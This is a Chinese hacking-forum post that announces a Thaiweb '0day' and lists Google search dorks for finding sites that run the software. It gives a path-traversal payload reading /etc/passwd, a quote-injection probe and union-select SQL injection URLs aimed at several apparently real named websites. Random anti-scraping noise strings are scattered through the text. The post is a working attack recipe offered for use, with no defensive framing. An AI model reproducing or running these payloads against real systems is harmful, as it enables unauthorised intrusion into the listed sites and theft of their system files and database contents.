找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2069|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
6 K( n+ D% U" K! f# R' F$ b  h8 \" D0 @% E) A2 j" g/ x
intext:powered by Thaiweb
! B( h7 K' K& @' K" _, i6 h2 r  M% s
inurl:index.php?page=board.php/ a8 `3 Y  f+ {
. H- j: ~( w- K: N

+ H  I6 g; H; U) Q1 b- O
  ]8 X1 W, B$ c- {" _7 y利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
$ g4 x0 [! @, D- d
- X6 D2 h* Z$ D1 X: ]+ ~ - n/ j' q1 y8 k+ B- U
7 \9 K8 ^7 S7 p% Y2 V( U+ {
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'/ |9 S$ J+ S8 d5 l0 g

. Q5 y% D2 Z+ i. r( M. _4 @ 9 P3 V7 G% Q  I- d* q; Y

1 V- u& J! l- B6 Lhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--, y  T- a8 @* M- p, o
. v* C3 |1 {5 y, W8 m: i7 M( N
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
* D9 h2 ]% X: H" [9 y* V- R; v
$ f1 l$ f( ]+ i6 I* S* ?5 s( Vhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 `/ a% L; w  S% W. L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表